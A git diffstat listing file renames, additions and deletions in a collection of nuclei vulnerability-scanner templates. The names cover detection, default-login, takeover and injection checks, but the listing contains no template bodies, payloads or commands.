.../Other/nginx-proxy-manager-9114.yaml | 25 - nuclei-templates/Other/nginx-status.yaml | 9 +- ...4.yaml => nginx-vhost-traffic-status.yaml} | 0 .../Other/ngrok-takeover-9128.yaml | 19 + .../Other/ngrok-takeover-9129.yaml | 19 - nuclei-templates/Other/nifi-detech-9131.yaml | 29 + nuclei-templates/Other/nifi-detech-9132.yaml | 30 - .../Other/node-integration-enabled-9137.yaml | 21 + .../Other/node-integration-enabled.yaml | 17 - nuclei-templates/Other/npm.yaml | 19 - .../Other/nps-default-login-9144.yaml | 51 - nuclei-templates/Other/nps-default-login.yaml | 41 + .../Other/ns-asg-file-read-9149.yaml | 29 + .../Other/ns-asg-file-read-9153.yaml | 19 - .../Other/ntlm-directories-9155.yaml | 80 - .../Other/ntlm-directories-9158.yaml | 64 + nuclei-templates/Other/nuclei_template.yaml | 21 + .../Other/nuuno-network-login-9161.yaml | 21 + .../Other/nuuno-network-login.yaml | 19 - ...ion.yaml => nuuo-file-inclusion-9167.yaml} | 0 .../Other/nuuo-nvrmini2-rce-9173.yaml | 23 + .../Other/nuuo-nvrmini2-rce-9174.yaml | 27 - .../Other/oa-tongda-path-traversal-9178.yaml | 34 + .../Other/oa-tongda-path-traversal-9179.yaml | 35 - .../Other/oa-v9-uploads-file-9187.yaml | 36 + .../Other/oa-v9-uploads-file-9190.yaml | 32 - .../Other/oauth-access-key-9184.yaml | 18 - nuclei-templates/Other/oauth-access-key.yaml | 18 + .../Other/oauth2-detect-9182.yaml | 27 - .../Other/octobercms-default-login-9192.yaml | 60 + .../Other/octobercms-default-login-9193.yaml | 65 - .../Other/octobercms-detect-9196.yaml | 26 - nuclei-templates/Other/octobercms-detect.yaml | 25 + .../Other/odoo-cms-redirect-9199.yaml | 17 + .../Other/odoo-cms-redirect-9201.yaml | 19 - ...5.yaml => odoo-database-manager-9202.yaml} | 0 .../Other/ofbiz-default-login-9211.yaml | 4 +- ...ments.yaml => office-documents-links.yaml} | 0 .../Other/office365-open-redirect-9212.yaml | 20 + .../Other/office365-open-redirect-9214.yaml | 24 - nuclei-templates/Other/oipm-detect-9221.yaml | 11 +- nuclei-templates/Other/oki-data.yaml | 5 +- .../Other/okiko-sfiler-portal-9227.yaml | 32 - .../Other/okiko-sfiler-portal-9230.yaml | 31 + nuclei-templates/Other/okta-panel-9231.yaml | 25 - nuclei-templates/Other/okta-panel-9234.yaml | 22 + ...9239.yaml => oliver-library-lfi-9240.yaml} | 0 ...244.yaml => olivetti-crf-detect-9243.yaml} | 0 .../Other/omigod-220331-223015.yaml | 95 + .../Other/oneblog-detect-9246.yaml | 21 + .../Other/oneblog-detect-9247.yaml | 19 - nuclei-templates/Other/onedev.yaml | 20 + ...=> oob-header-based-interaction-9250.yaml} | 0 .../Other/oos-bucket-public-access.yaml | 68 + ...9255.yaml => opcache-status-exposure.yaml} | 0 ...9282.yaml => open-mjpg-streamer-9284.yaml} | 0 .../Other/open-proxy-localhost-9292.yaml | 54 - .../Other/open-proxy-localhost.yaml | 61 + .../Other/open-proxy-portscan-9294.yaml | 62 + .../Other/open-proxy-portscan.yaml | 62 - .../Other/open-redirect-9309.yaml | 129 +- ...l => open-stack-dashboard-login-9323.yaml} | 0 ...en-virtualization-manager-detect-9325.yaml | 35 - .../open-virtualization-manager-detect.yaml | 42 + ...pen-virtualization-manager-panel-9327.yaml | 33 - .../open-virtualization-manager-panel.yaml | 39 + nuclei-templates/Other/openam-detection.yaml | 59 +- .../Other/opencast-detect-9262.yaml | 18 + .../Other/opencast-detect-9263.yaml | 25 - .../Other/opencast-detect-9264.yaml | 21 - .../Other/opencast-detect-9265.yaml | 24 + nuclei-templates/Other/opencti-lfi-9267.yaml | 22 +- ...n.yaml => openemr-default-login-9270.yaml} | 0 .../Other/openemr-detect-9271.yaml | 25 + .../Other/openemr-detect-9273.yaml | 24 - ...tabase.yaml => openerp-database-9275.yaml} | 0 .../Other/opennms-web-console-9285.yaml | 24 + .../Other/opennms-web-console.yaml | 20 - nuclei-templates/Other/openobserve-panel.yaml | 28 + .../Other/opensis-detect-9313.yaml | 20 + nuclei-templates/Other/opensis-lfi-9316.yaml | 27 + nuclei-templates/Other/opensis-lfi-9317.yaml | 28 - nuclei-templates/Other/opensis-panel.yaml | 27 - .../Other/opensis-workflow-9319.yaml | 11 - nuclei-templates/Other/opensis-workflow.yaml | 11 + ...opensns-rce.yaml => opensns-rce-9320.yaml} | 0 ...n.yaml => openwrt-default-login-9332.yaml} | 0 ...erations-automation-default-page-9339.yaml | 19 + ...erations-automation-default-page-9340.yaml | 20 - ...9346.yaml => oracle-business-control.yaml} | 0 .../Other/oracle-dbass-detect-9350.yaml | 18 - .../Other/oracle-dbass-detect-9351.yaml | 21 + nuclei-templates/Other/oracle-dbcs.yaml | 3 + ...=> oracle-ebs-sqllog-disclosure-9367.yaml} | 0 .../Other/oracle-ebs-xss-9375.yaml | 33 - nuclei-templates/Other/oracle-ebs-xss.yaml | 33 + .../Other/oracle-fatwire-lfi-9379.yaml | 18 +- .../Other/oracle-http-server-12c-9382.yaml | 20 + .../Other/oracle-http-server-12c.yaml | 23 - ...ver-12c.yaml => oracle-httpserver12c.yaml} | 0 .../Other/oracle-integrated-manager-9388.yaml | 31 + .../Other/oracle-integrated-manager.yaml | 27 - ...ml => oracle-iplanet-web-server-9392.yaml} | 0 nuclei-templates/Other/oracle-oam-xss.yaml | 28 - .../Other/oracle-people-enterprise-9394.yaml | 3 +- ...n.yaml => oracle-people-sign-in-9399.yaml} | 0 .../Other/oracle-siebel-xss-9400.yaml | 34 - .../Other/oracle-siebel-xss-9403.yaml | 24 + .../Other/otobo-open-redirect-9409.yaml | 9 +- nuclei-templates/Other/otobo-panel-9413.yaml | 7 +- ...ml => owasp-juice-shop-detected-9415.yaml} | 0 ...-config-9420.yaml => owncloud-config.yaml} | 0 .../pacs-connexion-utilisateur-9424.yaml | 23 + .../pacs-connexion-utilisateur-9426.yaml | 24 - .../Other/pacsone-server-lfi-9429.yaml | 19 - .../Other/pacsone-server-lfi-9430.yaml | 23 + nuclei-templates/Other/pagerduty.yaml | 25 - .../Other/panabit-default-login-9440.yaml | 17 +- .../Other/panabit-panel-9444.yaml | 4 + .../panasonic-network-management-9448.yaml | 21 + .../panasonic-network-management-9450.yaml | 20 - ...ole.yaml => pandora-fms-console-9453.yaml} | 0 ...455.yaml => panos-default-login-9457.yaml} | 0 .../Other/parallels-html-client-9462.yaml | 14 + .../Other/parallels-html-client-9464.yaml | 17 - ...xss-9466.yaml => parentlink-xss-9467.yaml} | 0 ...token.yaml => paypal-braintree-token.yaml} | 0 .../Other/pdf-signer-ssti-to-rce-9470.yaml | 22 + .../Other/pdf-signer-ssti-to-rce-9472.yaml | 25 - nuclei-templates/Other/pega-detect-9474.yaml | 23 - nuclei-templates/Other/pega-detect.yaml | 24 + .../Other/pentaho-default-login-9477.yaml | 38 - .../Other/pentaho-default-login.yaml | 33 + ...anel-9483.yaml => pentaho-panel-9481.yaml} | 0 nuclei-templates/Other/perl-status-9486.yaml | 18 - nuclei-templates/Other/perl-status-9487.yaml | 16 + ...posure.yaml => pgadmin-exposure-9488.yaml} | 0 ...aml => phalcon-framework-source-9494.yaml} | 0 nuclei-templates/Other/php-backup-files.yaml | 2 +- ...-bar-9507.yaml => php-debug-bar-9506.yaml} | 0 nuclei-templates/Other/php-errors-9509.yaml | 43 + nuclei-templates/Other/php-errors-9511.yaml | 41 - ...m-config-9514.yaml => php-fpm-config.yaml} | 0 nuclei-templates/Other/php-ini-9523.yaml | 3 + .../Other/php-proxy-detect-9545.yaml | 32 + nuclei-templates/Other/php-proxy-detect.yaml | 32 - ...k-xss.yaml => php-timeclock-xss-9552.yaml} | 0 .../Other/php-user-ini-disclosure-9559.yaml | 7 +- .../Other/php-zerodium-backdoor-rce-9572.yaml | 5 - ...rce.yaml => php8devrce-220331-222821.yaml} | 0 ...detect-9501.yaml => phpcollab-detect.yaml} | 0 ...9502.yaml => phpcollab-workflow-9503.yaml} | 0 nuclei-templates/Other/phpinfo-9517.yaml | 44 - nuclei-templates/Other/phpinfo-9520.yaml | 47 + .../Other/phpmyadmin-misconfiguration.yaml | 38 - ...ort.yaml => phpmyadmin-server-import.yaml} | 0 .../Other/phpmyadmin-setup-9529.yaml | 33 - nuclei-templates/Other/phpmyadmin-setup.yaml | 36 + .../Other/phpmyadmin-sql-9536.yaml | 31 + nuclei-templates/Other/phpok-sqli-9538.yaml | 25 - nuclei-templates/Other/phpok-sqli.yaml | 34 + ...l-9539.yaml => phppgadmin-panel-9543.yaml} | 0 nuclei-templates/Other/phpunit-9557.yaml | 24 - nuclei-templates/Other/phpunit-9558.yaml | 20 + nuclei-templates/Other/phpwiki-lfi-9566.yaml | 25 + nuclei-templates/Other/phpwiki-lfi-9568.yaml | 19 - .../Other/pi-hole-detect-9581.yaml | 21 + .../Other/pi-hole-detect-9582.yaml | 26 - .../Other/pingdom-takeover-9585.yaml | 19 + nuclei-templates/Other/pingdom-takeover.yaml | 16 - ...-unauth-9588.yaml => pinpoint-unauth.yaml} | 0 .../Other/plastic-scm-login-9591.yaml | 22 + nuclei-templates/Other/plastic-scm-login.yaml | 20 - nuclei-templates/Other/platform.yaml | 58 - .../Other/plesk-obsidian-9597.yaml | 8 +- nuclei-templates/Other/plesk-onyx-9601.yaml | 19 + nuclei-templates/Other/plesk-onyx-login.yaml | 20 - ...detect-9608.yaml => plone-cms-detect.yaml} | 0 .../Other/pmb-local-file-disclosure-9615.yaml | 22 - .../Other/pmb-local-file-disclosure-9620.yaml | 18 + .../Other/pollbot-redirect-9623.yaml | 23 - nuclei-templates/Other/pollbot-redirect.yaml | 26 + ...ogin-9625.yaml => polycom-login-9627.yaml} | 0 ...0.yaml => portainer-init-deploy-9628.yaml} | 0 .../Other/possible-AEM-secrets.yaml | 44 + .../Other/postmessage-outgoing-tracker.yaml | 4 +- .../Other/postmessage-tracker-9638.yaml | 3 +- ...47.yaml => powercreator-cms-rce-9646.yaml} | 0 ...etect.yaml => prestashop-detect-9651.yaml} | 0 ...leak-9652.yaml => printers-info-leak.yaml} | 0 nuclei-templates/Other/private-key-9657.yaml | 21 - nuclei-templates/Other/private-key.yaml | 21 + .../Other/processmaker-lfi-9659.yaml | 28 - .../Other/processmaker-lfi-9660.yaml | 23 + ...on-logs.yaml => production-logs-9663.yaml} | 0 ...d-config-9667.yaml => proftpd-config.yaml} | 0 ...n.yaml => project-insight-login-9668.yaml} | 0 ...1.yaml => prometheus-config-endpoint.yaml} | 0 ...ter.yaml => prometheus-exporter-9677.yaml} | 0 .../Other/prometheus-exposed-panel.yaml | 17 - ...-flags-9687.yaml => prometheus-flags.yaml} | 0 .../Other/prometheus-targets-9691.yaml | 28 - .../Other/prometheus-targets-9692.yaml | 29 + ....yaml => prometheus-targets-endpoint.yaml} | 0 nuclei-templates/Other/promothoues-panel.yaml | 17 + ...over-9693.yaml => proposify-takeover.yaml} | 0 .../Other/prototype-pollution-check-9699.yaml | 96 + .../Other/prototype-pollution-check.yaml | 94 - nuclei-templates/Other/provider-path.yaml | 14 - ...prtg-detect.yaml => prtg-detect-9705.yaml} | 0 .../Other/ptr-fingerprint-9707.yaml | 30 + nuclei-templates/Other/ptr-fingerprint.yaml | 22 - .../Other/public-actiontrail-bucket.yaml | 57 + .../Other/public-tomcat-manager-9708.yaml | 21 - .../Other/public-tomcat-manager.yaml | 25 + ...9712.yaml => pulse-secure-panel-9714.yaml} | 0 .../Other/puppetboard-panel-9716.yaml | 23 - nuclei-templates/Other/puppetboard-panel.yaml | 22 + ...-detect.yaml => puppetdb-detect-9717.yaml} | 0 .../Other/puppetserver-detect-9721.yaml | 35 + .../Other/puppetserver-detect-9722.yaml | 38 - nuclei-templates/Other/put-m-enb.yaml | 24 - .../Other/put-method-enabled-9728.yaml | 29 + .../putty-private-key-disclosure-9732.yaml | 22 - .../Other/putty-private-key-disclosure.yaml | 26 + ...d-panel-9734.yaml => pypicloud-panel.yaml} | 0 ...re-9737.yaml => pyproject-disclosure.yaml} | 0 ...r-9741.yaml => pyramid-debug-toolbar.yaml} | 0 ...ml => python-app-sql-exceptions-9744.yaml} | 0 .../Other/python-metrics-9745.yaml | 29 - .../Other/python-metrics-9747.yaml | 29 + .../Other/qdpm-info-leak-9753.yaml | 10 +- ...netkang-next-generation-firewall-rce.yaml} | 0 .../Other/qihang-media-disclosure-9762.yaml | 20 - .../Other/qihang-media-disclosure.yaml | 29 + ...in-byPass.yaml => qizhi-login-bypass.yaml} | 0 .../Other/qnap-qts-panel-9770.yaml | 30 + nuclei-templates/Other/qnap-qts-panel.yaml | 44 - .../2378487680.yaml => Other/quasar.yaml} | 0 .../qvisdvr-deserialization-rce-9773.yaml | 42 + .../Other/qvisdvr-deserialization-rce.yaml | 45 - .../Other/rabbitmq-dashboard-9776.yaml | 17 - .../Other/rabbitmq-dashboard.yaml | 15 + ...-9786.yaml => rabbitmq-default-login.yaml} | 0 nuclei-templates/Other/race-multiple.yaml | 23 + nuclei-templates/Other/race-simple.yaml | 46 - .../Other/rack-mini-profiler-9789.yaml | 18 + .../Other/rack-mini-profiler-9791.yaml | 18 - .../Other/radius-manager-9794.yaml | 25 + .../Other/radius-manager-9795.yaml | 22 - .../Other/rails-database-config-9802.yaml | 26 + .../Other/rails-database-config-9803.yaml | 22 - ...g-mode-9807.yaml => rails-debug-mode.yaml} | 0 .../rails-secret-token-disclosure-9810.yaml | 25 - .../Other/rails-secret-token-disclosure.yaml | 22 + nuclei-templates/Other/rails6-xss-9797.yaml | 32 - nuclei-templates/Other/rails6-xss-9798.yaml | 31 + .../Other/rainloop-default-login-9811.yaml | 21 +- .../Other/ranger-default-login-9828.yaml | 78 +- nuclei-templates/Other/ranger-detection.yaml | 4 - .../Other/rce-cve-2021-41773.yaml | 16 - ...ml => rce-shellshock-user-agent-9832.yaml} | 0 nuclei-templates/Other/rconfig-rce-9834.yaml | 57 - nuclei-templates/Other/rconfig-rce-9837.yaml | 57 + ...-detect-9838.yaml => rdp-detect-9840.yaml} | 0 .../Other/readme-takeover-9842.yaml | 10 +- .../Other/readthedocs-takeover-9844.yaml | 15 + .../Other/readthedocs-takeover-9845.yaml | 18 - nuclei-templates/Other/redash-detection.yaml | 27 + nuclei-templates/Other/redash-panel.yaml | 18 - nuclei-templates/Other/redis-server.yaml | 24 + nuclei-templates/Other/redis.yaml | 23 - nuclei-templates/Other/redmin-cli-detect.yaml | 23 - .../Other/redmine-cli-detect.yaml | 26 + .../Other/reflected-value-via-query.yaml | 31 +- ...t-9857.yaml => remkon-manager-detect.yaml} | 0 .../Other/request-based-interaction-9863.yaml | 56 + .../Other/request-based-interaction.yaml | 54 - .../Other/resin-cnnvd-200705-315-9865.yaml | 25 + .../Other/resin-cnnvd-200705-315-9866.yaml | 23 - ...-lfr-9874.yaml => resin-viewfile-lfr.yaml} | 0 .../Other/rhymix-cms-detect-9878.yaml | 23 + .../Other/rhymix-cms-detect-9879.yaml | 27 - .../Other/ricoh-weak-password-9880.yaml | 37 + .../Other/ricoh-weak-password-9882.yaml | 36 - ...ord.yaml => ricoh-weak-password-9883.yaml} | 0 .../Other/ricoh-webimagemonitor-panel.yaml | 35 + .../Other/robomongo-credential-9884.yaml | 33 + .../Other/robomongo-credential.yaml | 28 - .../{robots.txt.yaml => robots-9889.yaml} | 0 .../Other/rocketmq-console-exposure-9894.yaml | 14 + .../Other/rocketmq-console-exposure.yaml | 17 - ...-xss-9902.yaml => rockmongo-xss-9904.yaml} | 0 ...aml => roundcube-log-disclosure-9905.yaml} | 0 .../Other/routeros-login-9908.yaml | 20 + nuclei-templates/Other/routeros-login.yaml | 25 - .../Other/rsa-self-service-9910.yaml | 25 - .../Other/rsa-self-service-9912.yaml | 25 + .../Other/rseenet-default-login-9915.yaml | 44 - .../Other/rseenet-default-login.yaml | 39 + ...t-detect.yaml => rseenet-detect-9916.yaml} | 0 ...eDownload.yaml => ruijie-EG-fileDown.yaml} | 0 .../Other/ruijie-eg-password-leak-9924.yaml | 45 - .../Other/ruijie-eg-password-leak.yaml | 39 + .../Other/ruijie-eg-rce-9926.yaml | 7 +- ...aml => ruijie-nbr1300g-exposure-9936.yaml} | 0 .../Other/ruijie-nbr1300g-exposure-9937.yaml | 13 +- .../Other/ruijie-networks-lfi-9940.yaml | 26 - .../Other/ruijie-networks-lfi-9941.yaml | 28 + .../Other/ruijie-networks-rce-9948.yaml | 36 + .../Other/ruijie-networks-rce-9949.yaml | 36 - .../Other/ruijie-phpinfo-9951.yaml | 5 +- ...sty-joomla-9955.yaml => rusty-joomla.yaml} | 0 nuclei-templates/Other/rxss.yaml | 21 - ...3-detect-9965.yaml => s3-detect-9963.yaml} | 0 .../Other/s3-subtakeover-9967.yaml | 4 +- ...cmd-config.yaml => s3cmd-config-9961.yaml} | 0 nuclei-templates/Other/s3hunter.yaml | 14 - .../Other/saferoads-vms-login-9970.yaml | 15 - .../Other/saferoads-vms-login-9974.yaml | 17 + ...detect-9977.yaml => sage-detect-9975.yaml} | 0 .../Other/salesforce-aura-9983.yaml | 19 + nuclei-templates/Other/salesforce-aura.yaml | 20 - nuclei-templates/Other/samba-config-9986.yaml | 24 - nuclei-templates/Other/samba-config-9987.yaml | 24 + nuclei-templates/Other/samba-detect-9988.yaml | 17 + nuclei-templates/Other/samba-detect.yaml | 25 - .../Other/samba-swat-panel-9991.yaml | 17 - nuclei-templates/Other/samba-swat-panel.yaml | 17 + .../Other/samsung-printer-detect-9993.yaml | 24 - .../Other/samsung-printer-detect.yaml | 24 + .../Other/samsung-wlan-ap-lfi-10001.yaml | 4 +- .../Other/samsung-wlan-ap-rce-10004.yaml | 26 + .../Other/samsung-wlan-ap-rce-10010.yaml | 23 - .../Other/samsung-wlan-ap-xss-10012.yaml | 6 +- ...-ba-rce-10020.yaml => sangfor-BA-rce.yaml} | 0 .../Other/sangfor-ba-rce-10021.yaml | 30 - .../Other/sangfor-edr-rce-10026.yaml | 28 - nuclei-templates/Other/sangfor-edr-rce.yaml | 24 + .../Other/sap-hana-xsengine-panel-10037.yaml | 18 + .../Other/sap-hana-xsengine-panel.yaml | 16 - ...-detect-10039.yaml => sap-igs-detect.yaml} | 0 .../Other/sap-netweaver-detect-10042.yaml | 30 - .../Other/sap-netweaver-detect-10044.yaml | 26 + .../Other/sap-netweaver-portal-10055.yaml | 19 + .../Other/sap-netweaver-portal.yaml | 16 - .../Other/sap-recon-detect-10062.yaml | 1 + ...-redirect.yaml => sap-redirect-10067.yaml} | 0 .../Other/sap-web-dispatcher-10075.yaml | 5 +- .../sap-web-dispatcher-admin-portal.yaml | 8 +- ...i-panel-10034.yaml => sapfiori-panel.yaml} | 0 .../Other/sar2html-rce-10082.yaml | 24 + nuclei-templates/Other/sar2html-rce.yaml | 22 - ...ter-login.yaml => sauter-login-10089.yaml} | 0 ...detect.yaml => sceditor-detect-10094.yaml} | 0 .../Other/scs-landfill-control.yaml | 3 - nuclei-templates/Other/seacms-rce-10100.yaml | 26 + nuclei-templates/Other/seacms-rce-10102.yaml | 23 - ...-media-rce.yaml => seagate-media-rce.yaml} | 0 ...edia-sqli.yaml => seagate-media-sqli.yaml} | 0 nuclei-templates/Other/secmail-detect.yaml | 7 +- ...aml => secnet-ac-default-login-10113.yaml} | 0 .../Other/secure-transfeross-disabled.yaml | 68 + ...nt-utm.yaml => securepoint-utm-10118.yaml} | 0 nuclei-templates/Other/security-txt.yaml | 37 - nuclei-templates/Other/security.txt.yaml | 25 + ...ect-10121.yaml => securityspy-detect.yaml} | 0 .../Other/seeddms-default-login-10125.yaml | 40 + .../Other/seeddms-default-login.yaml | 35 - ...-detect.yaml => seeddms-detect-10129.yaml} | 0 .../Other/selea-ip-camera-10133.yaml | 7 +- nuclei-templates/Other/selenium-exposure.yaml | 6 +- .../Other/sendgrid-api-key-10142.yaml | 2 - .../{api-sendgrid.yaml => sendgrid.yaml} | 0 ...e.yaml => sensitive-storage-exposure.yaml} | 0 .../Other/seowon-router-rce-10148.yaml | 27 - .../Other/seowon-router-rce-10149.yaml | 35 + .../Other/sequoiadb-default-login-10150.yaml | 43 + .../Other/sequoiadb-default-login-10152.yaml | 52 - .../Other/server-backup-login-10156.yaml | 19 - .../Other/server-backup-login.yaml | 19 + .../Other/server-backup-manager-se-10160.yaml | 22 + ...server-backup-manager-se-login-detect.yaml | 33 - ...ervice-pwd-10179.yaml => service-pwd.yaml} | 0 ...aml => servicedesk-login-panel-10172.yaml} | 0 ...servicenow-helpdesk-credential-10175.yaml} | 0 ...es-xss(1).yaml => setpreferences-xss.yaml} | 0 .../Other/setup-page-exposure-10180.yaml | 21 - .../Other/setup-page-exposure-10181.yaml | 23 + ...-10185.yaml => sgp-login-panel-10184.yaml} | 0 ...ogin-10189.yaml => sharecenter-login.yaml} | 0 .../Other/shell-history-10192.yaml | 102 +- ...l_scripts.yaml => shellscripts-10194.yaml} | 0 ...pped100-sqli.yaml => shipped100-sqli.yaml} | 0 .../Other/shiro-detect-10195.yaml | 16 + nuclei-templates/Other/shiro-detect.yaml | 19 - ...199.yaml => shopify-private-token(1).yaml} | 0 .../Other/shopify-shared-secret(1).yaml | 16 - .../Other/shopify-shared-secret-10200.yaml | 13 + .../Other/shopify-takeover-10202.yaml | 16 - nuclei-templates/Other/shopify-takeover.yaml | 26 + .../Other/shopify-token-11863.yaml | 16 - nuclei-templates/Other/shopify-token.yaml | 13 + ...-token.yaml => shoppable-token-10208.yaml} | 0 ...detect-10213.yaml => shopware-detect.yaml} | 0 ...erver.yaml => shoutcast-server-10217.yaml} | 0 ...unction.yaml => show-version-warning.yaml} | 0 ....yaml => showdoc-default-login-10222.yaml} | 0 .../Other/showdoc-file-upload-rce-10225.yaml | 44 - .../Other/showdoc-file-upload-rce.yaml | 39 + ...s-10230.yaml => sick-beard-xss-10233.yaml} | 0 .../Other/sidekiq-dashboard-10235.yaml | 22 - .../Other/sidekiq-dashboard-10239.yaml | 26 + nuclei-templates/Other/signatures-10251.yaml | 90954 ++++ nuclei-templates/Other/signatures-10262.yaml | 409178 --------------- nuclei-templates/Other/signatures-10266.yaml | 201698 ------- ...ml => simple-crm-sql-injection-10275.yaml} | 0 ...yaml => simplebooklet-takeover-10274.yaml} | 0 .../Other/sitecore-login-10289.yaml | 24 + nuclei-templates/Other/sitecore-login.yaml | 20 - ...rsion.yaml => sitecore-version-10291.yaml} | 0 ...flow-10293.yaml => sitecore-workflow.yaml} | 0 .../Other/{SiteCore.yaml => sitecore.yaml} | 0 ...10298.yaml => sitefinity-login-10295.yaml} | 0 nuclei-templates/Other/sitemap-detect.yaml | 36 + nuclei-templates/Other/sitemap.yaml | 39 - .../Other/siteomat-login-10301.yaml | 22 + .../Other/siteomat-login-10303.yaml | 20 - .../Other/skycaiji-admin-panel.yaml | 8 +- .../Other/skycaiji-install-10307.yaml | 26 - nuclei-templates/Other/skycaiji-install.yaml | 22 + nuclei-templates/Other/slack-api(1).yaml | 16 + nuclei-templates/Other/slack-api-11864.yaml | 13 - ...-10312.yaml => slack-bot-token-10310.yaml} | 0 ...-webhook.yaml => slack-webhook-11865.yaml} | 0 nuclei-templates/Other/slack.yaml | 25 + .../Other/smartjob-takeover-10322.yaml | 17 - .../Other/smartjob-takeover-10323.yaml | 20 + .../Other/smartling-takeover.yaml | 2 - ...ml => smartsense-default-login-10328.yaml} | 0 .../Other/smartstore-detect-10333.yaml | 34 - nuclei-templates/Other/smartstore-detect.yaml | 28 + .../Other/smb-v1-detection-10335.yaml | 18 + .../Other/smb-v1-detection-10336.yaml | 22 - .../Other/smugmug-takeover-10337.yaml | 3 +- ...=> snyk-ignore-file-disclosure-10347.yaml} | 0 ...50.yaml => sofneta-mecdream-pacs-lfi.yaml} | 0 .../Other/solarwinds-default-login-10355.yaml | 45 - .../Other/solarwinds-default-login.yaml | 37 + .../Other/solarwinds-orion-10357.yaml | 18 + .../Other/solarwinds-orion-10359.yaml | 15 - .../Other/solr-exposure-10363.yaml | 24 - nuclei-templates/Other/solr-exposure.yaml | 28 + .../Other/solr-query-dashboard-10367.yaml | 24 - .../Other/solr-query-dashboard-10369.yaml | 20 + ...omfy-login-10373.yaml => somfy-login.yaml} | 0 .../Other/sonarqube-login-10374.yaml | 18 + nuclei-templates/Other/sonarqube-login.yaml | 18 - ...l => sonarqube-public-projects-10377.yaml} | 0 .../Other/sonarqube-token-10380.yaml | 17 - nuclei-templates/Other/sonarqube-token.yaml | 15 + .../sonicwall-management-panel-10385.yaml | 17 + .../Other/sonicwall-management-panel.yaml | 17 - .../Other/sonicwall-sslvpn-panel.yaml | 2 +- .../sonicwall-sslvpn-shellshock-10395.yaml | 26 - .../Other/sonicwall-sslvpn-shellshock.yaml | 33 + ...uth.yaml => spark-webui-unauth-10401.yaml} | 0 ...ml => spectracom-default-login-10403.yaml} | 0 ...in-10409.yaml => sphider-login-10408.yaml} | 0 .../Other/splunk-enterprise-panel-10415.yaml | 23 +- .../Other/splunk-login-10418.yaml | 20 + .../Other/splunk-login-10420.yaml | 23 - .../{spon-ip-rce(1).yaml => spon-ip-rce.yaml} | 0 .../{SPON-IP-SSRF.yaml => spon-ip-ssrf.yaml} | 0 .../sponip-network-system-ping-rce-10421.yaml | 24 - .../sponip-network-system-ping-rce-10422.yaml | 21 + .../spoofable-spf-records-ptr-10426.yaml | 20 + .../Other/spoofable-spf-records-ptr.yaml | 19 - ...=> spring-framework-exceptions-10493.yaml} | 0 .../Other/spring-functions-rce.yaml | 4 +- .../Other/springboot-actuator-10433.yaml | 2 +- ...ringboot-actuators-jolokia-xxe-10429.yaml} | 0 ...10438.yaml => springboot-beans-10440.yaml} | 0 .../Other/springboot-configprops-10443.yaml | 32 + .../Other/springboot-configprops-10445.yaml | 33 - ...-actuators.yaml => springboot-detect.yaml} | 0 .../Other/springboot-dump-10446.yaml | 31 + .../Other/springboot-dump-10447.yaml | 31 - ...v-10449.yaml => springboot-env-10448.yaml} | 0 ...way.yaml => springboot-gateway-10452.yaml} | 0 .../Other/springboot-h2-db-rce-10455.yaml | 37 + .../Other/springboot-h2-db-rce.yaml | 40 - .../Other/springboot-health-10459.yaml | 25 - nuclei-templates/Other/springboot-health.yaml | 24 + .../Other/springboot-heapdump-10465.yaml | 30 - .../Other/springboot-heapdump.yaml | 60 + .../Other/springboot-httptrace-10467.yaml | 32 + .../Other/springboot-httptrace-10469.yaml | 33 - ...-10471.yaml => springboot-info-10470.yaml} | 0 ...e.yaml => springboot-log4j-rce-10473.yaml} | 0 ...81.yaml => springboot-mappings-10479.yaml} | 0 .../Other/springboot-metrics-10482.yaml | 29 + .../Other/springboot-metrics-10483.yaml | 32 - ....yaml => springboot-threaddump-10486.yaml} | 0 ...10492.yaml => springboot-trace-10490.yaml} | 0 .../Other/sprintful-takeover-10494.yaml | 24 - .../Other/sprintful-takeover-10495.yaml | 29 + nuclei-templates/Other/sql-dump-10497.yaml | 47 - nuclei-templates/Other/sql-dump-10498.yaml | 42 + .../{pikpikcusqli.yaml => sql-injection.yaml} | 0 .../Other/sql-server-reporting-10508.yaml | 16 - .../Other/sql-server-reporting.yaml | 14 + nuclei-templates/Other/sqli-error-based.yaml | 32 - nuclei-templates/Other/sqli2.yaml | 50 + .../Other/sqli_header (copy 1).yaml | 25 - ...en.yaml => square-access-token-11867.yaml} | 0 .../Other/square-oauth-secret(1).yaml | 16 - .../Other/square-oauth-secret-11868.yaml | 13 + ...squid-analysis-report-generator-10512.yaml | 35 - ...squid-analysis-report-generator-10514.yaml | 32 + ...s-10515.yaml => squirrelmail-add-xss.yaml} | 0 ...10518.yaml => squirrelmail-lfi-10517.yaml} | 0 nuclei-templates/Other/sse-cmk-disabled.yaml | 76 + nuclei-templates/Other/sse-smk-disabled.yaml | 75 + ...-hosts-10524.yaml => ssh-known-hosts.yaml} | 0 nuclei-templates/Other/ssrf-detection.yaml | 22 - .../Other/ssrf-via-oauth-misconfig-10526.yaml | 12 +- nuclei-templates/Other/ssrf_nagli.yaml | 21 + .../Other/{ssti.yaml => ssti-jinja2.yaml} | 0 ...530.yaml => stackstorm-default-login.yaml} | 0 .../Other/strapi-cms-detect-10538.yaml | 22 + nuclei-templates/Other/strapi-cms-detect.yaml | 19 - .../Other/strapi-documentation-10543.yaml | 34 + .../Other/strapi-documentation.yaml | 28 - nuclei-templates/Other/strapi-page-10545.yaml | 19 + nuclei-templates/Other/strapi-page.yaml | 17 - .../Other/strikingly-takeover-10550.yaml | 20 + .../Other/strikingly-takeover-10552.yaml | 17 - nuclei-templates/Other/stripe-api-key(1).yaml | 16 - nuclei-templates/Other/stripe-api-key.yaml | 13 + .../Other/stripe-restricted-key-10553.yaml | 4 +- .../Other/stripe-secret-key-10558.yaml | 15 - nuclei-templates/Other/stripe-secret-key.yaml | 17 + nuclei-templates/Other/stripe.yaml | 16 +- nuclei-templates/Other/strut-debug-mode.yaml | 17 - .../Other/struts-debug-mode-10560.yaml | 19 + .../Other/subdomain-takeover.yaml | 183 + ...y-login.yaml => submitty-login-10567.yaml} | 0 ...l-10569.yaml => sugarcrm-panel-10571.yaml} | 0 ...yaml => superset-default-login-10573.yaml} | 0 .../Other/supervpn-panel-10577.yaml | 17 - nuclei-templates/Other/supervpn-panel.yaml | 14 + .../Other/surge-takeover-10578.yaml | 18 + ...r.yaml => surveygizmo-takeover-10583.yaml} | 0 .../Other/suspicious-sql-error-messages.yaml | 2 +- nuclei-templates/Other/swagger-ui-bypass.yaml | 31 - nuclei-templates/Other/swagger-ui.yaml | 68 - .../Other/symantec-dlp-login-10596.yaml | 24 + .../Other/symantec-dlp-login-10598.yaml | 21 - .../Other/symantec-epm-login-10599.yaml | 24 + .../Other/symantec-epm-login-10602.yaml | 20 - 